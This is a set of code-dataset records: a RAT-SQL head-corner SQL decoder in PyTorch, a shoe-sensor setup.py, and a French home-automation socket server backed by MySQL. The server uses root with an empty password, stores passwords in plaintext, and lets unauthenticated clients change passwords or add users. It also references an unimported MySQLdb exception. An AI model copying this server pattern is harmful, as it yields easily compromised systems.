query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size,\n proj_size=50)\n elif desc_attn == 'mha':\n self.desc_attn = attention.MultiHeadedAttention(\n h=8,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n elif desc_attn == 'mha-1h':\n self.desc_attn = attention.MultiHeadedAttention(\n h=1,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n elif desc_attn == 'sep':\n self.question_attn = attention.MultiHeadedAttention(\n h=1,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n self.schema_attn = attention.MultiHeadedAttention(\n h=1,\n query_size=self.recurrent_size,\n value_size=self.enc_recurrent_size)\n else:\n # TODO: Figure out how to get right sizes (query, value) to module\n self.desc_attn = desc_attn\n self.sup_att = sup_att\n self.rule_logits = torch.nn.Sequential(\n torch.nn.Linear(self.recurrent_size, self.rule_emb_size),\n torch.nn.Tanh(),\n torch.nn.Linear(self.rule_emb_size, len(self.rules_index)))\n self.rule_embedding = torch.nn.Embedding(\n num_embeddings=len(self.rules_index),\n embedding_dim=self.rule_emb_size)\n\n self.gen_logodds = torch.nn.Linear(self.recurrent_size, 1)\n self.terminal_logits = torch.nn.Sequential(\n torch.nn.Linear(self.recurrent_size, self.rule_emb_size),\n torch.nn.Tanh(),\n torch.nn.Linear(self.rule_emb_size, len(self.terminal_vocab)))\n self.terminal_embedding = torch.nn.Embedding(\n num_embeddings=len(self.terminal_vocab),\n embedding_dim=self.rule_emb_size)\n if copy_pointer is None:\n self.copy_pointer = attention.BahdanauPointer(\n query_size=self.recurrent_size,\n key_size=self.enc_recurrent_size,\n proj_size=50)\n else:\n # TODO: Figure out how to get right sizes (query, key) to module\n self.copy_pointer = copy_pointer\n if multi_loss_type == 'logsumexp':\n self.multi_loss_reduction = lambda logprobs: -torch.logsumexp(logprobs, dim=1)\n elif multi_loss_type == 'mean':\n self.multi_loss_reduction = lambda logprobs: -torch.mean(logprobs, dim=1)\n\n self.pointers = torch.nn.ModuleDict()\n self.pointer_action_emb_proj = torch.nn.ModuleDict()\n for pointer_type in self.preproc.grammar.pointers:\n self.pointers[pointer_type] = attention.ScaledDotProductPointer(\n query_size=self.recurrent_size,\n key_size=self.enc_recurrent_size)\n self.pointer_action_emb_proj[pointer_type] = torch.nn.Linear(\n self.enc_recurrent_size, self.rule_emb_size)\n\n self.node_type_embedding = torch.nn.Embedding(\n num_embeddings=len(self.node_type_vocab),\n embedding_dim=self.node_emb_size)\n\n # TODO batching\n self.zero_rule_emb = torch.zeros(1, self.rule_emb_size, device=self._device)\n self.zero_recurrent_emb = torch.zeros(1, self.recurrent_size, device=self._device)\n if loss_type == \"softmax\":\n self.xent_loss = torch.nn.CrossEntropyLoss(reduction='none')\n elif loss_type == \"entmax\":\n self.xent_loss = entmax.entmax15_loss\n elif loss_type == \"sparsemax\":\n self.xent_loss = entmax.sparsemax_loss\n elif loss_type == \"label_smooth\":\n self.xent_loss = self.label_smooth_loss\n\n self.goals = None\n self.head_corners = None\n self.operation = None\n\n def label_smooth_loss(self, X, target, smooth_value=0.1):\n if self.training:\n logits = torch.log_softmax(X, dim=1)\n size = X.size()[1]\n one_hot = torch.full(X.size(), smooth_value / (size - 1)).to(X.device)\n one_hot.scatter_(1, target.unsqueeze(0), 1 - smooth_value)\n loss = F.kl_div(logits, one_hot, reduction=\"batchmean\")\n return loss.unsqueeze(0)\n else:\n return torch.nn.functional.cross_entropy(X, target, reduction=\"none\")\n\n @classmethod\n def _calculate_rules(cls, preproc):\n offset = 0\n\n all_rules = []\n rules_mask = {}\n\n # Rules of the form:\n # expr -> Attribute | Await | BinOp | BoolOp | ...\n # expr_seq_elem -> Attribute | Await | ... | Template1 | Template2 | ...\n for parent, children in sorted(preproc.sum_type_constructors.items()):\n assert parent not in rules_mask\n rules_mask[parent] = (offset, offset + len(children))\n offset += len(children)\n all_rules += [(parent, child) for child in children]\n\n # Rules of the form:\n # FunctionDef\n # -> identifier name, arguments args\n # | identifier name, arguments args, stmt* body\n # | identifier name, arguments args, expr* decorator_list\n # | identifier name, arguments args, expr? returns\n # ...\n # | identifier name, arguments args, stmt* body, expr* decorator_list, expr returns\n for name, field_presence_infos in sorted(preproc.field_presence_infos.items()):\n assert name not in rules_mask\n rules_mask[name] = (offset, offset + len(field_presence_infos))\n offset += len(field_presence_infos)\n all_rules += [(name, presence) for presence in field_presence_infos]\n\n # Rules of the form:\n # stmt* -> stmt\n # | stmt stmt\n # | stmt stmt stmt\n for seq_type_name, lengths in sorted(preproc.seq_lengths.items()):\n assert seq_type_name not in rules_mask\n rules_mask[seq_type_name] = (offset, offset + len(lengths))\n offset += len(lengths)\n all_rules += [(seq_type_name, i) for i in lengths]\n\n return all_rules, rules_mask\n\n def compute_rule_masks(self, grammar_path):\n\n # paths for head-corner settings\n path_to_preterminals = os.path.join(grammar_path, \"preterminals.csv\")\n path_to_head_map = os.path.join(grammar_path, \"rule_to_head.csv\")\n\n # goal to preterminals\n preterminal_map = {}\n preterminal_masks = {}\n preterminal_debug = {}\n preterminal_types = set()\n with open(path_to_preterminals, 'r') as csv_file:\n elems = csv.reader(csv_file)\n for goal, prets in elems:\n prets = set([s.strip() for s in prets.strip().split(\",\") if s != \"\"])\n preterminal_types = preterminal_types.union(prets)\n\n all_rules = list(self.preproc.all_rules + tuple([(\"\", \"**MATCH**\")]) + tuple([(\"\", p) for p in preterminal_types]))\n rules_index = {v: idx for idx, v in enumerate(all_rules)}\n\n with open(path_to_preterminals, 'r') as csv_file:\n elems = csv.reader(csv_file)\n for goal, prets in elems:\n prets = [s.strip() for s in prets.strip().split(\",\") if s != \"\"]\n mask_ids = sorted([rules_index[(\"\", p)] for p in prets])\n preterminal_map[goal] = prets\n preterminal_masks[goal] = mask_ids\n preterminal_debug[goal] = set(mask_ids)\n\n # rule to head\n rule_to_head = {}\n parent_to_rule = collections.defaultdict(list)\n head_to_rule = collections.defaultdict(list)\n parent_to_head = collections.defaultdict(list)\n with open(path_to_head_map, 'r') as csv_file:\n elems = csv.reader(csv_file)\n for rule_type, rule, head in elems:\n rule_to_head[rule] = int(head.strip())-1\n if \" -> \" in rule:\n lhs, rhs = rule.split(\" -> \")\n else:\n lhs, rhs = rule.strip().rstrip(\" ->\"), \"\"\n\n if len(rhs):\n split_rhs = [tuple(elem.strip().split(\"/\")) for elem in rhs.split(\",\")]\n parent_to_head[lhs] += [split_rhs[rule_to_head[rule]]]\n head_to_rule[parent_to_head[lhs][-1][0]] += [(lhs, rule)]\n parent_to_rule[lhs] += [[elem.strip() for elem in rhs.split(\",\")]]\n else:\n parent_to_head[lhs] = []\n parent_to_rule[lhs] = []\n\n seq_types = set([lhs for lhs, rhs in rules_index if lhs.endswith(\"*\")])\n for stype in seq_types:\n head = stype.rstrip(\"*\")\n parent_to_head[stype] = [(head, \"NULL\")]\n head_to_rule[head] += [(stype, stype + \" -> \" + head + \"/NULL\")]\n\n # derive head corners for goal nonterminals\n head_corners = {key: set([v[0] for v in value]) for key, value in parent_to_head.items()}\n def dfs(parent, table, visited=set()):\n for head in table[parent]:\n visited.add(parent)\n if head in visited:\n table[parent] = table[parent].union(table[head])\n else:\n dfs(head, table, visited)\n table[parent] = table[parent].union(table[head])\n for key in preterminal_map:\n dfs(key, head_corners)\n\n # now get head corner table -- set of grammar rules available\n # given a head and a goal state\n head_corner_table = {}\n hc_debug = {}\n for goal_state in preterminal_masks:\n head_corner_table[goal_state] = collections.defaultdict(set)\n hc_debug[goal_state] = collections.defaultdict(set)\n for head in head_corners[goal_state]:\n for parent, rule in head_to_rule.get(head):\n if parent in head_corners[goal_state]:\n head_corner_table[goal_state][head].add(rule)\n hc_debug[goal_state][head] = set()\n elif parent == goal_state:\n head_corner_table[goal_state][head].add(rule)\n hc_debug[goal_state][head] = set()\n # given a rule, get the set of indices in rule vocab corresponding to it\n for key_1 in head_corner_table:\n for key_2 in head_corner_table[key_1]:\n mask = []\n for rule in head_corner_table[key_1][key_2]:\n lhs, _ = rule.split(\" ->\")\n mask += get_rule_match_indices(lhs, rule, rules_index)\n head_corner_table[key_1][key_2] = sorted(mask)\n hc_debug[key_1][key_2] = set(mask)\n\n return all_rules, rules_index, preterminal_map, preterminal_masks, preterminal_debug, preterminal_types,\\\n head_corners, head_corner_table, hc_debug, parent_to_head, parent_to_rule\n\n def fetch_head_from_node(self, node):\n parent_type = node[\"_type\"]\n\n name_to_type = {elem[1]: elem[0] for elem in self.parent_to_head[parent_type]}\n for key in node.keys():\n if key != \"_type\":\n if key in name_to_type:\n return key, name_to_type[key]\n return None, []\n\n def construct_oracle_sequence(self, tree_state, oracle_sequence, goal_type=None):\n\n goal_was_false = not goal_type\n\n root_type, node = tree_state\n\n if isinstance(node, list): ## you've hit the child of an aggregator, visit each of the children\n if goal_was_false:\n root_type += \"*\"\n goal_type = root_type\n\n is_sum_type = root_type[:-1] in self.ast_wrapper.sum_types\n\n for i, elem in enumerate(node):\n if i == 0:\n if not is_sum_type:\n self.construct_oracle_sequence((None, elem), oracle_sequence, goal_type=goal_type)\n # new here\n else:\n self.construct_oracle_sequence((root_type[:-1], elem), oracle_sequence, goal_type=goal_type)\n # here, check if the parent is a sum type constructor, if so, add an extra expand up\n #if is_sum_type: ### commenting out for now\n # oracle_sequence.append(ExpandUp(rule=(root_type[:-1], elem[\"_type\"]), goal_type=goal_type))\n rule = get_rule_string_from_node(root_type, node, self.ast_wrapper)\n oracle_sequence.append(ExpandUp(rule=rule, goal_type=goal_type))\n else:\n if not is_sum_type:\n self.construct_oracle_sequence((None, elem), oracle_sequence, goal_type=None)\n else:\n self.construct_oracle_sequence((root_type[:-1], elem), oracle_sequence, goal_type=None)\n # here, check if the parent is a sum type constructor, if so, replace match with ExpandUP, then **MATCH**\n #if is_sum_type:\n # ## oracle_sequence[-1] = ExpandUp(rule=(root_type[:-1], elem[\"_type\"]), goal_type=goal_type)\n # oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=root_type[:-1]))\n\n if goal_was_false:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=goal_type))\n\n elif isinstance(node, dict): ## you're dealing with a Constructor or a ProductType\n\n node_type = node[\"_type\"]\n\n if len(node) == 1:\n try:\n assert goal_was_false\n except:\n print(node)\n raise AssertionError\n\n oracle_sequence.append(PredictPreterminal(ttype=node_type,\n goal_type=root_type))\n oracle_sequence.append(ExpandUp(rule=(root_type, node_type),\n goal_type=root_type))\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\",\n goal_type=root_type))\n else:\n parent_rule = get_rule_string_from_node(root_type, node, self.ast_wrapper)\n if goal_was_false:\n if parent_rule:\n goal_type = root_type\n else:\n goal_type = node[\"_type\"]\n\n head_field_name, head_field_type = self.fetch_head_from_node(node)\n self.construct_oracle_sequence((head_field_type, node[head_field_name]), oracle_sequence,\n goal_type=goal_type)\n\n # fetch the right rule form for this dict\n type_info = self.ast_wrapper.singular_types[node_type]\n present = get_field_presence_info(self.ast_wrapper, node, type_info.fields)\n rule = (node['_type'], tuple(present))\n oracle_sequence.append(ExpandUp(rule=rule, goal_type=goal_type))\n\n leftover_children = [field for (field, p) in zip(self.ast_wrapper.singular_types[node_type].fields,\n present) if p and field.name != head_field_name]\n\n for child in leftover_children:\n self.construct_oracle_sequence((child.type, node[child.name]), oracle_sequence, goal_type=None)\n\n if parent_rule:\n oracle_sequence.append(ExpandUp(rule=parent_rule, goal_type=goal_type))\n\n # see what happens when you change the position of this\n if goal_was_false:\n if root_type:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=root_type))\n else:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=node_type))\n\n else:\n # something going on with singletons that we want to fix\n #if root_type not in [\"table\", \"column\"]:\n # root_type = str(type(node))\n if goal_was_false:\n goal_type = root_type\n # predicting a preterminal, pointing to its value. match if appropriate.\n oracle_sequence.append(PredictPreterminal(ttype=root_type,\n goal_type=goal_type))\n oracle_sequence.append(Point(ttype=root_type,\n value=node))\n if goal_was_false:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=goal_type))\n\n def augment_data_with_oracle(self, zipped_data):\n encoder_data, decoder_data = zip(*zipped_data)\n\n oracle_sequences = []\n for elem in decoder_data:\n oracle_sequence = self.compute_oracle_sequence(elem)\n oracle_sequences.append(oracle_sequence)\n\n return zip(encoder_data, decoder_data, oracle_sequences)\n\n def begin_inference(self, desc_enc, example):\n traversal = InferenceTreeTraversal(self, desc_enc, example)\n choices = traversal.step(None)\n return traversal, choices\n\n def compute_loss(self, enc_input, example, desc_enc, debug):\n mle_loss = self.compute_mle_loss(enc_input, example, desc_enc, debug)\n\n if self.use_align_loss:\n align_loss = self.compute_align_loss(desc_enc, example[0])\n return mle_loss + align_loss\n return mle_loss\n\n def init_state(self, enc_input, example, desc_enc):\n self.goals.append((\"sql\", None))\n self.head_corners = []\n self.operation = self.State.PREDICT_HEAD_CORNER\n\n def compute_mle_loss(self, enc_input, example, desc_enc, debug):\n\n _, oracle = example\n\n # copy this over because pop is destructive\n oracle = oracle[:]\n\n #print(\"##########\")\n #print(json.dumps(example[0].tree, indent=2))\n #print(oracle)\n\n traversal = TrainTreeTraversal(self, desc_enc)\n traversal.step(None)\n while oracle:\n action = oracle.pop(0)\n if isinstance(action, PredictPreterminal):\n index = self.rules_index[(\"\", action.ttype)]\n goal_type = action.goal_type\n assert traversal.current_state == TreeTraversal.State.PRETERMINAL_APPLY\n assert traversal.goals[-1].node_type == goal_type\n try:\n assert index in self.preterminal_debug[goal_type]\n except:\n # print(action)\n raise AssertionError\n traversal.step(index)\n elif isinstance(action, ExpandUp):\n hc = traversal.head_corners[-1]\n if action.rule == \"**MATCH**\":\n index = self.rules_index[(\"\", action.rule)]\n else:\n index = self.rules_index[action.rule]\n # made change here this could be made stricter by giving head corner items goal types\n assert index in self.hc_debug[traversal.goals[-1].node_type][hc.root_type]\n traversal.step(index)\n else: # point\n assert traversal.current_state in [TreeTraversal.State.POINTER_APPLY,\n TreeTraversal.State.GEN_TOKEN_APPLY]\n if action.ttype not in [\"table\", \"column\"]:\n # we're doing conventional pointing (which we handle as strings)\n value = action.value\n field_value_split = self.preproc.grammar.tokenize_field_value(value) + [\n vocab.EOS]\n for value in field_value_split:\n traversal.step(value)\n else:\n pointer_map = desc_enc.pointer_maps.get(action.ttype)\n value = action.value\n\n if pointer_map:\n values = pointer_map[value]\n traversal.step(values[0], values[1:])\n else:\n traversal.step(value)\n\n loss = torch.sum(torch.stack(tuple(traversal.loss), dim=0), dim=0)\n\n hc = traversal.head_corners[-1]\n converted = traversal.convert_head_corner_to_node_rep(hc)\n\n t1 = json.dumps(converted, indent=2, sort_keys=True)\n t2 = json.dumps(example[0].tree, indent=2, sort_keys=True)\n\n # print(t1)\n # print(t2)\n assert t1 == t2\n\n return loss\n\n def compute_loss_from_all_ordering(self, enc_input, example, desc_enc, debug):\n def get_permutations(node):\n def traverse_tree(node):\n nonlocal permutations\n if isinstance(node, (list, tuple)):\n p = itertools.permutations(range(len(node)))\n permutations.append(list(p))\n for child in node:\n traverse_tree(child)\n elif isinstance(node, dict):\n for node_name in node:\n traverse_tree(node[node_name])\n\n permutations = []\n traverse_tree(node)\n return permutations\n\n def get_perturbed_tree(node, permutation):\n def traverse_tree(node, parent_type, parent_node):\n if isinstance(node, (list, tuple)):\n nonlocal permutation\n p_node = [node[i] for i in permutation[0]]\n parent_node[parent_type] = p_node\n permutation = permutation[1:]\n for child in node:\n traverse_tree(child, None, None)\n elif isinstance(node, dict):\n for node_name in node:\n traverse_tree(node[node_name], node_name, node)\n\n node = copy.deepcopy(node)\n traverse_tree(node, None, None)\n return node\n\n orig_tree = example.tree\n permutations = get_permutations(orig_tree)\n products = itertools.product(*permutations)\n loss_list = []\n for product in products:\n tree = get_perturbed_tree(orig_tree, product)\n example.tree = tree\n loss = self.compute_mle_loss(enc_input, example, desc_enc)\n loss_list.append(loss)\n example.tree = orig_tree\n loss_v = torch.stack(loss_list, 0)\n return torch.logsumexp(loss_v, 0)\n\n def _desc_attention(self, prev_state, desc_enc):\n # prev_state shape:\n # - h_n: batch (=1) x emb_size\n # - c_n: batch (=1) x emb_size\n query = prev_state[0]\n if self.attn_type != 'sep':\n return self.desc_attn(query, desc_enc.memory, attn_mask=None)\n else:\n question_context, question_attention_logits = self.question_attn(query, desc_enc.question_memory)\n schema_context, schema_attention_logits = self.schema_attn(query, desc_enc.schema_memory)\n return question_context + schema_context, schema_attention_logits\n\n def _tensor(self, data, dtype=None):\n return torch.tensor(data, dtype=dtype, device=self._device)\n\n def _index(self, vocab, word):\n return self._tensor([vocab.index(word)])\n\n def _update_state(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n prec_h,\n prec_action_emb,\n prec_goal,\n desc_enc):\n # desc_context shape: batch (=1) x emb_size\n desc_context, attention_logits = self._desc_attention(prev_state, desc_enc)\n # node_type_emb shape: batch (=1) x emb_size\n node_type_emb = self.node_type_embedding(\n self._index(self.node_type_vocab, node_type))\n\n state_input = torch.cat(\n (\n prev_action_emb, # a_{t-1}: rule_emb_size\n desc_context, # c_t: enc_recurrent_size\n prec_h, # s_{p_t}: recurrent_size\n prec_action_emb, # a_{p_t}: rule_emb_size\n prec_goal, # recurrent_size (goal node) CHANGE MADE HERE\n node_type_emb, # n_{f-t}: node_emb_size\n ),\n dim=-1)\n new_state = self.state_update(\n # state_input shape: batch (=1) x (emb_size * 5)\n state_input, prev_state)\n return new_state, attention_logits\n\n def apply_rule(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n prec_h,\n prec_action_emb,\n prec_goal,\n desc_enc):\n\n new_state, attention_logits = self._update_state(\n node_type, prev_state, prev_action_emb, prec_h, prec_action_emb, prec_goal, desc_enc)\n # output shape: batch (=1) x emb_size\n output = new_state[0]\n # rule_logits shape: batch (=1) x num choices\n rule_logits = self.rule_logits(output)\n\n return output, new_state, rule_logits\n\n def rule_infer(self, node_type, goal_type, rule_logits, state):\n rule_logprobs = torch.nn.functional.log_softmax(rule_logits, dim=-1)\n\n ## changed both from inquire to apply -- shouldn't make a difference?\n if state == TreeTraversal.State.EXPAND_UP_APPLY:\n assert goal_type\n rule_ids = self.hc_table[goal_type][node_type]\n if goal_type == node_type:\n rule_ids = rule_ids.union(set([self.rules_index[(\"\", \"**MATCH**\")]]))\n rule_ids = sorted(list(rule_ids))\n elif state == TreeTraversal.State.PRETERMINAL_APPLY:\n rule_ids = self.preterminal_mask[node_type]\n else:\n print(\"Rule infer should only be evoked for expand up and predict preterminal.\")\n raise NotImplementedError\n\n return list(zip(rule_ids, [rule_logprobs[0, idx] for idx in rule_ids]))\n\n\n def gen_token(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n prec_h,\n prec_action_emb,\n goal_h,\n desc_enc):\n\n new_state, attention_logits = self._update_state(\n node_type, prev_state, prev_action_emb, prec_h, prec_action_emb, goal_h, desc_enc)\n # output shape: batch (=1) x emb_size\n output = new_state[0]\n\n # gen_logodds shape: batch (=1)\n gen_logodds = self.gen_logodds(output).squeeze(1)\n\n return new_state, output, gen_logodds\n\n def gen_token_loss(\n self,\n output,\n gen_logodds,\n token,\n desc_enc):\n # token_idx shape: batch (=1), LongTensor\n token_idx = self._index(self.terminal_vocab, token)\n # action_emb shape: batch (=1) x emb_size\n action_emb = self.terminal_embedding(token_idx)\n\n # +unk, +in desc: copy\n # +unk, -in desc: gen (an unk token)\n # -unk, +in desc: copy, gen\n # -unk, -in desc: gen\n # gen_logodds shape: batch (=1)\n desc_locs = desc_enc.find_word_occurrences(token)\n if desc_locs:\n # copy: if the token appears in the description at least once\n # copy_loc_logits shape: batch (=1) x desc length\n copy_loc_logits = self.copy_pointer(output, desc_enc.memory)\n copy_logprob = (\n # log p(copy | output)\n # shape: batch (=1)\n torch.nn.functional.logsigmoid(-gen_logodds) -\n # xent_loss: -log p(location | output)\n # TODO: sum the probability of all occurrences\n # shape: batch (=1)\n self.xent_loss(copy_loc_logits, self._tensor(desc_locs[0:1])))\n else:\n copy_logprob = None\n\n # gen: ~(unk & in desc), equivalent to ~unk | ~in desc\n if token in self.terminal_vocab or copy_logprob is None:\n token_logits = self.terminal_logits(output)\n # shape:\n gen_logprob = (\n # log p(gen | output)\n # shape: batch (=1)\n torch.nn.functional.logsigmoid(gen_logodds) -\n # xent_loss: -log p(token | output)\n # shape: batch (=1)\n self.xent_loss(token_logits, token_idx))\n else:\n gen_logprob = None\n\n # loss should be -log p(...), so negate\n loss_piece = -torch.logsumexp(\n maybe_stack([copy_logprob, gen_logprob], dim=1),\n dim=1)\n return loss_piece\n\n def token_infer(self, output, gen_logodds, desc_enc):\n # Copy tokens\n # log p(copy | output)\n # shape: batch (=1)\n copy_logprob = torch.nn.functional.logsigmoid(-gen_logodds)\n copy_loc_logits = self.copy_pointer(output, desc_enc.memory)\n # log p(loc_i | copy, output)\n # shape: batch (=1) x seq length\n copy_loc_logprobs = torch.nn.functional.log_softmax(copy_loc_logits, dim=-1)\n # log p(loc_i, copy | output)\n copy_loc_logprobs += copy_logprob\n\n log_prob_by_word = {}\n # accumulate_logprobs is needed because the same word may appear\n # multiple times in desc_enc.words.\n accumulate_logprobs(\n log_prob_by_word,\n zip(desc_enc.words, copy_loc_logprobs.squeeze(0)))\n\n # Generate tokens\n # log p(~copy | output)\n # shape: batch (=1)\n gen_logprob = torch.nn.functional.logsigmoid(gen_logodds)\n token_logits = self.terminal_logits(output)\n # log p(v | ~copy, output)\n # shape: batch (=1) x vocab size\n token_logprobs = torch.nn.functional.log_softmax(token_logits, dim=-1)\n # log p(v, ~copy| output)\n # shape: batch (=1) x vocab size\n token_logprobs += gen_logprob\n\n accumulate_logprobs(\n log_prob_by_word,\n ((self.terminal_vocab[idx], token_logprobs[0, idx]) for idx in range(token_logprobs.shape[1])))\n\n return list(log_prob_by_word.items())\n\n def compute_pointer(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n parent_h,\n parent_action_emb,\n desc_enc):\n new_state, attention_logits = self._update_state(\n node_type, prev_state, prev_action_emb, parent_h, parent_action_emb, desc_enc)\n # output shape: batch (=1) x emb_size\n output = new_state[0]\n # pointer_logits shape: batch (=1) x num choices\n pointer_logits = self.pointers[node_type](\n output, desc_enc.pointer_memories[node_type])\n\n return output, new_state, pointer_logits, attention_logits\n\n def pointer_infer(self, node_type, logits):\n logprobs = torch.nn.functional.log_softmax(logits, dim=-1)\n return list(zip(\n # TODO batching\n range(logits.shape[1]),\n logprobs[0]))","sub_path":"ratsql/models/head_corner/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":39595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61145079","text":"import os\nfrom setuptools import setup, find_packages\n\nBASEDIR = os.path.dirname(os.path.abspath(__file__))\nVERSION = open(os.path.join(BASEDIR, 'VERSION')).read().strip()\n\nBASE_DEPENDENCIES = [\n 'wf-database-connection-honeycomb>=0.2.1',\n 'bluepy>=1.3.0',\n 'click>=7.0'\n]\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(BASEDIR))\n\nsetup(\n name='wf-shoe-sensor',\n packages=find_packages(),\n version=VERSION,\n include_package_data=True,\n description='Python package for communicating with Wildflower shoe sensors through BLE interface',\n long_description=open('README.md').read(),\n url='https://github.com/WildflowerSchools/shoe_sensor',\n author='Theodore Quinn',\n author_email='ted.quinn@wildflowerschools.org',\n install_requires=BASE_DEPENDENCIES,\n keywords=['bluetooth'],\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"17890509","text":"#!/usr/bin/python\n\nimport os\nimport socket\nimport sys\nimport glob\nimport select\nimport mysql.connector\nimport re\n\t\t\nconfig = {\n'user': 'root',\n'password': '',\n'host': '127.0.0.1',\n'port': '3306',\n'database': 'maison',\n'raise_on_warnings': True,}\n\ndef decodeTrame(encode):\n\treponse = \"null\"\n\tconn = mysql.connector.connect(**config)\n\tcursor = conn.cursor()\n\tencode = re.split('\\n', encode)\n\tif(encode[0] == '1'): # RECHERCHE UTILISATEUR\n\t\tcursor.execute(\"\"\"SELECT NIV FROM utilisateur WHERE NOM=%s AND MDP=%s\"\"\", (encode[1], encode[2], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\tif(rows != None):\n\t\t\treponse = num[0]\n\t\t\treturn str(reponse).encode()\n\tif(encode[0] == '2'): # NOMBRE PIECES\n\t\tcursor.execute(\"SELECT COUNT(*) FROM pieces\")\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\tif(rows != None):\n\t\t\treponse = num[0]\n\t\t\treturn str(reponse).encode()\n\tif(encode[0] == '3'): # TOUTE LES PIECES\n\t\tcursor.execute(\"SELECT NOM FROM pieces\")\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\treponse = \"\"\n\t\tfor row in num:\n\t\t\treponse += row + '\\n'\n\t\tif(rows != None):\n\t\t\treturn reponse.encode()\n\tif(encode[0] == '4'): # NOMBRE COMPOSANT\n\t\tcursor.execute(\"\"\"SELECT COUNT(*) FROM composant WHERE PIECE=%s\"\"\", (encode[1], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\tif(rows != None):\n\t\t\treponse = num[0]\n\t\t\treturn str(reponse).encode()\n\tif(encode[0] == '5'): # TOUS LES COMPOSANT\n\t\tcursor.execute(\"\"\"SELECT NOM, GA, NIV FROM composant WHERE PIECE=%s\"\"\", (encode[1], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\treponse = \"\"\n\t\tfor row in num:\n\t\t\treponse += str(row) + '\\n'\n\t\tprint(reponse)\n\t\tif(rows != None):\n\t\t\treturn reponse.encode()\n\tif(encode[0] == '6'): # MODIFICATION MDP UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"UPDATE utilisateur SET MDP=%s WHERE NOM=%s\"\"\", (encode[2], encode[1], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '7'): # MODIFICATION MDP & NIV UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"UPDATE utilisateur SET MDP=%s, NIV=%s WHERE NOM=%s\"\"\", (encode[2], encode[3], encode[1], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '8'): # RECHERCHE NIV UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"UPDATE utilisateur SET NIV=%s WHERE NOM=%s\"\"\", (encode[2], encode[1], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '9'): # AJOUT UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"INSERT INTO utilisateur (NOM, MDP, NIV) VALUES (%s, %s, %s)\"\"\", (encode[1], encode[2], encode[3], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '10'): # DEJA USER\n\t\tcursor.execute(\"\"\"SELECT ID FROM utilisateur WHERE NOM=%s\"\"\", (encode[1], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\treponse = \"\"\n\t\tfor row in num:\n\t\t\treponse += str(row) + '\\n'\n\t\tprint(reponse)\n\t\tif(rows != None):\n\t\t\treturn reponse.encode()\n\treturn reponse.encode()\n\nhote = 'localhost' # 192.168.1.104\nport = 3176\nconnexion_principale = None\nconnexion_principale = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnexion_principale.bind((hote, port))\nconnexion_principale.listen(3) #nombre de connexion simultané\nprint(\"Le serveur ecoute {}\".format(port))\nwhile 1:\n serveur_lance = True\n print(\"\\t\\t+++++ DEBUT +++++\")\n clients_connectes = []\n while serveur_lance:\n connexions_demandees, wlist, xlist = select.select([connexion_principale],[], [], 0.05)\n for connexion in connexions_demandees:\n connexion_avec_client, infos_connexion = connexion.accept()\n clients_connectes.append(connexion_avec_client)\n clients_a_lire = []\n try:\n clients_a_lire, wlist, xlist = select.select(clients_connectes,[], [], 0.05)\n except select.error:\n pass\n else:\n for client in clients_a_lire:\n # Client est de type socket\n msg_recu = client.recv(2048)\n msg_recu = msg_recu.decode()\n print(\"Recu -> {0}\".format(msg_recu) + \"\\tDepuis -> {0}\".format(infos_connexion))\n client.send(decodeTrame(msg_recu))\n serveur_lance = False\n client.close()\n print(\"Communication fini avec success...\")\n print(\"\\t\\t+++++ END +++++\")\nfor client in clients_connectes:\n client.close()\nconnexion_principale.close()\n","sub_path":"Serveur/serveur.py","file_name":"serveur.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298522878","text":"from .designdocs import (\n db_model_token,\n db_definition,\n db_data,\n db_data_item,\n)\n\n\nclass Database(object):\n 